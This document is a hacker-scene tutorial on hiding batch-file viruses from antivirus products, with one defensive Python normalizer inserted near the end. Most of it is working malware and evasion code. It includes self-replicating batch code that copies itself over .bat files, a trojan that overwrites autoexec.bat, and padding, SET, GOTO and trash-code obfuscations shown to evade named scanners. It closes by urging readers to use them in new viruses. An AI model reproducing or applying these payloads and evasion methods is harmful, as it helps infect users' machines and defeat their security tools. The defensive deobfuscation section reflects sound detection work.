TUTORIAL: Anti AV Techniques For Batch
by cOrRuPt G3n3t!x
In order to make our batch file virus a little more inconspicuous, unreadable or undetectable,
we use batch encryption techniques to fool AVs and people trying to read or decipher our code.
There are many different ways, and today I'll explain all the ways I know for batch
encryption and for fooling AVs and AV heuristics. I used ESET NOD32 Anti-Virus for its great heuristics
capabilities and Avast4 Professional Edition for normal detection. Please remember all techniques
have been tested on Windows Vista and work!
1)EICAR Test File:
----------------
AV companies needed a way to test whether their product works on the user's computer
without bringing harm to it, so EICAR was born: a universal string of code that will set off
all AVs but will display 'EICAR TEST FILE NOT A VIRUS' or something similar. We therefore
add this string to the beginning of our code in the hope that the user will let it run after seeing that
it's a test file and not a virus. This will help when infecting people with limited knowledge of viruses,
so definitely not a great technique when compared to the others, but nonetheless, here's the string for the
EICAR 'Virus', which should be added to the beginning of your code:
-------------------------------[Cut Here]--------------------------------------
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
-------------------------------[Cut Here]--------------------------------------
2)Fake Bytes:
-----------
All AVs will only scan the first 1000 bytes of a batch file for any malicious code, so what do we do?
We add a whole bunch of letters in the first 1000 bytes of our code, pretty easy and an excellent
way to bypass scanners and in some cases AV heuristics. So here is exactly 1000 bytes of useless code
which should be pasted at the beginning of your code:
-------------------------------[Cut Here]--------------------------------------
jfnvjdfvbdfrjcedjcndskcjlewkjdelkasusywkiqwndsjhcgbdkisknckichcdsjyefgwiednnauxxbjnkaskjgbuhyhdgddr
djdchcvnfdhvjknvjknvfbdfhvbdfjncfdnfhvjrhskjfnmaskldnchfvbgfvffscdjfbnjehcfnjhcbjhnvdjuknvchdhbhvhf
fdgvcdfgcvjhvbnfvfdhbfvdjnfvdnbjfvnjgbnjkfvsjlsfdjhfsndsajkfdsvefeyufguyshduygfbdbcyufreubfuyhfdbk
fndsfungcuhfjhcvnhsfdncjsjzlixldjfouyfhfrufmrnjhggvcnnfvdeyhfyfghnfguhfuyndfhfdrsognfdhjfdyfdhfdhg
fhvbdh7rhuigfuhgudjfdujguighsudgduhgjugsifdkgiojfdhiudfgmnjhdgufhuigfjguijgukhgkjgufdhgjfugfchghjh
hsbdfjdrbfjdbgvfovngkllksfjbnmgkjvnvjkgfnkbfgvhnfgijgfjknfghjgffghdunvuhnuihgfgjifugjiuhdruiryhgui
dsbdyhceyifgbycgnjhfhjhvfbdgjhnhjhsdhbgsftrhgbvsrulsfkewajfreihnrnusrnvcuhiurgfeuygfruyfgybfdbkjkd
dscgfbdofnjkfhnkjfnkovmhuihgudljcugrhnuhvgvnuivgfhgdfigjngnklvtghnmgiojgfnkjgfhnfhngfvjnkfgvlkgfng
fdkbsdcfhnmvghnfvkjfjkgfpkogjroisjoersmcetkuntbggkhgjhdlewrlkjrhjiurnvuinvynbtrhurenyviuntruirtunv
dsuifhuyafgbycfgruyfgnucafipjnfnjkhnfidhfvmdkhzkdlhfnuygjkdngtfrjhnguhyghsduvbgrjkhvsriulkghnkjhgu
-------------------------------[Cut Here]--------------------------------------
3)Standard Encryption Technique (SET):
-----------------------------------
As the acronym would suggest, this is a technique whereby the 'set' command in MS-DOS is used
to encrypt the batch file and make it hard for the AV to analyze and for the user to interpret.
We do this by assigning each command word to a variable with a set command; this might not make sense yet, but see below.
This was detected as 'BAT/Silly.D Virus' by ESET NOD32:
-------------------------------[Cut Here]--------------------------------------
for %%a in (*.bat) do copy %0 %%a
-------------------------------[Cut Here]--------------------------------------
Now by encrypting the variables for, in, do and copy it will become undetected. Although it was not
detected even when only one of the variables was encrypted, this will not always be the case.
This was not detected by ESET NOD32 or Avast4:
-------------------------------[Cut Here]--------------------------------------
set a=for
set b=in
set c=do
set d=copy
%a% %%a %b% (*.bat) %c% %d% %0 %%a
-------------------------------[Cut Here]--------------------------------------
This will be complicated for others to read, but not for people with a knowledge of batch, so what
you could do is make the set encryption appear at the bottom of your code and begin reading at the top;
this will work well with large code, as the user will have to scroll down to see the set encryption. You
can do this simply by having a 'GOTO' command that jumps to the decryption section before returning
to the encrypted code. Using more than one variable will make it much harder to read! See below:
-------------------------------[Cut Here]--------------------------------------
@echo off
GOTO decrypt
:infect
%a% %%a %b% (*.bat) %c% %d% %0 %%a
%a% %%a %b% (C:\*.bat) %c% %d% %0 %%a
%a% %%a %b% (C:\Windows*.bat) %c% %d% %0 %%a
exit
:decrypt
set a=for
set b=in
set c=do
set d=copy
goto infect
-------------------------------[Cut Here]--------------------------------------
4)Character Overflow:
-------------------
First off, thanks to DvL for this idea, and now let's begin. This is just an awesome name I gave to
an Anti AV technique that will help by hiding your lines and keep the AV from detecting the right tokens
in your batch. All you need to do is add characters between each line of your code; they can also be numbers.
I used the character 'n' as it was used in the legendary SASSER worm to cause a buffer overrun.
The only snag is the virus has to have more than 3 or 4 lines to work effectively.
This is a virus by Ratty which was detected as 'BAT/Ratty.Substcde.A Trojan' by ESET NOD32:
-------------------------------[Cut Here]--------------------------------------
@echo off
ctty nul
@echo subst e: a:\ > c:\autoexec.bat
@echo subst d: a:\ >> c:\autoexec.bat
@echo subst c: a:\ >> c:\autoexec.bat
ctty con
cls
-------------------------------[Cut Here]--------------------------------------
When using the Character Overflow technique it was not detected by ESET NOD32:
-------------------------------[Cut Here]--------------------------------------
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
@echo off
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
ctty nul
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
@echo subst e: a:\ > c:\autoexec.bat
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
@echo subst d: a:\ >> c:\autoexec.bat
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
@echo subst c: a:\ >> c:\autoexec.bat
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
ctty con
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
cls
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
-------------------------------[Cut Here]--------------------------------------
5)GOTO Confuser:
--------------
This is a bit impractical, as it takes extremely long and is pretty confusing depending on the size of your code.
It only works with code that is longer than 5 lines. What it does is confuse the AV by using
multiple goto commands so the strings of the virus are separated and not read as a single token, so it won't be detected.
This is a virus by Ratty which was detected as 'BAT/Ratty.Substcde.A Trojan' by ESET NOD32:
-------------------------------[Cut Here]--------------------------------------
@echo off
ctty nul
@echo subst e: a:\ > c:\autoexec.bat
@echo subst d: a:\ >> c:\autoexec.bat
@echo subst c: a:\ >> c:\autoexec.bat
ctty con
cls
-------------------------------[Cut Here]--------------------------------------
Using the GOTO confuser it was not detected by ESET NOD32:
-------------------------------[Cut Here]--------------------------------------
@echo off
goto a
:f
ctty nul
goto b
:l
@echo subst e: a:\ > c:\autoexec.bat
goto c
:m
@echo subst d: a:\ >> c:\autoexec.bat
goto d
:r
@echo subst c: a:\ >> c:\autoexec.bat
ctty con
cls
:a
goto f
:b
goto l
:c
goto m
:d
goto r
-------------------------------[Cut Here]--------------------------------------
6)Trash Code:
-----------
This refers to lines of code that simply do nothing, but as far as the AV is concerned it's working code,
so what do we do with this in mind? We put meaningless garbage between our actual code. It is, however,
important to note that the lines you are using as trash code are not used for anything:
This was detected as 'BAT/Silly.D Virus' by ESET NOD32:
-------------------------------[Cut Here]--------------------------------------
for %%a in (*.bat) do copy %0 %%a
-------------------------------[Cut Here]--------------------------------------
When using garbage or trash code it was not detected:
-------------------------------[Cut Here]--------------------------------------
set trash=
%trash% for %trash% %%a %trash% in %trash% (*.bat) %trash% do %trash% copy %trash% %0 %trash% %%a
-------------------------------[Cut Here]--------------------------------------
In the first line we made sure trash was set to nothing, then added the code to the virus; it worked
perfectly without being detected!
7)Fake SET technique:
------------------
Although our Standard Encryption technique is strong enough against heuristics and AVs, this technique will make it
much harder to be found and also to be debugged. This technique involves the "set variable=command" form, except
we first give the variables fake commands and then set the real commands. See below for more clarity:
-------------------------------[Cut Here]--------------------------------------
set acv=ren
set acv=for
set acv=copy
set axv=yes
set axv=for
set lmno=ggg
set lmno=in
%axv% %%a %lmno% (*.bat) do %acv% %0 %%a
-------------------------------[Cut Here]--------------------------------------
As you can see, we reassigned the variable a few times, which begins to get tricky, especially when
the code is long! No AV will detect this as it has no set string, and it will give heuristics
a hard time emulating the code!
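A scanner-side counterpart to techniques 2 through 7, added here as an example and not part of the original tutorial: a Python normalizer that drops padding lines, follows goto chains and expands set variables in execution order before matching, so the 'encrypted' forms above collapse back to the plain lines the scanners flagged. The regexes, the SAMPLE text and the SIGNATURES list are my own constructions based on the samples in this tutorial.

```python
import re
# Padding like the "fake bytes"/"character overflow" tricks: one long run of letters or digits.
FILLER_RE = re.compile(r"^[A-Za-z0-9]{40,}$")
VAR_RE = re.compile(r"%([A-Za-z_]\w*)%")
SET_RE = re.compile(r"^set\s+([A-Za-z_]\w*)=(.*)$", re.IGNORECASE)
GOTO_RE = re.compile(r"^goto\s+(\S+)$", re.IGNORECASE)
# The strings this tutorial reports the scanners flagging.
SIGNATURES = ("for %%a in (*.bat) do copy %0 %%a", "subst c: a:\\ >> c:\\autoexec.bat")

# Constructed sample: section 3's SET-plus-GOTO layout with a padding line, a fake SET
# reassignment and an empty trash variable mixed in.
SAMPLE = """@echo off
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
GOTO decrypt
:infect
%a% %trash% %%a %b% (*.bat) %c% %trash% %d% %0 %%a
:decrypt
set trash=
set a=ren
set a=for
set b=in
set c=do
set d=copy
goto infect
"""

def normalize_batch(text):
    """Walk the file as cmd.exe would: drop padding, follow goto chains and
    expand %var% from the set lines executed so far (last assignment wins)."""
    lines = [ln.strip() for ln in text.splitlines()]
    labels = {ln[1:].lower(): i for i, ln in enumerate(lines) if ln.startswith(":")}
    env, out, seen, i = {}, [], set(), 0
    while i < len(lines) and i not in seen:  # a revisited line means a loop, so stop
        seen.add(i)
        ln, i = lines[i], i + 1
        if not ln or ln.startswith(":") or FILLER_RE.match(ln):
            continue
        # Expand only defined variables; %0 and %%a are left untouched.
        ln = VAR_RE.sub(lambda m: env.get(m.group(1).lower(), m.group(0)), ln)
        ln = " ".join(ln.split())  # close the gaps that trash code leaves
        if m := SET_RE.match(ln):
            env[m.group(1).lower()] = m.group(2)
        elif m := GOTO_RE.match(ln):
            i = labels.get(m.group(1).lower(), len(lines))
        else:
            out.append(ln)
    return out

def matches_signature(text):
    """True if any signature appears in the normalized command lines."""
    return any(s.lower() in "\n".join(normalize_batch(text)).lower() for s in SIGNATURES)
```

The same walk also undoes the GOTO confuser and the character overflow padding from sections 4 and 5, since those only reorder or interleave lines without changing what actually executes.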
I hope to see you using some of these techniques in up-and-coming batch file virii! If there are any problems with my code
or you have a question, just e-mail me and I'll gladly help. Remember this is for educational purposes only; do not use it
maliciously! KEEP On Batching... :)
[?]Contact Me:
-----------
[@]immortalassassin@rocketmail.com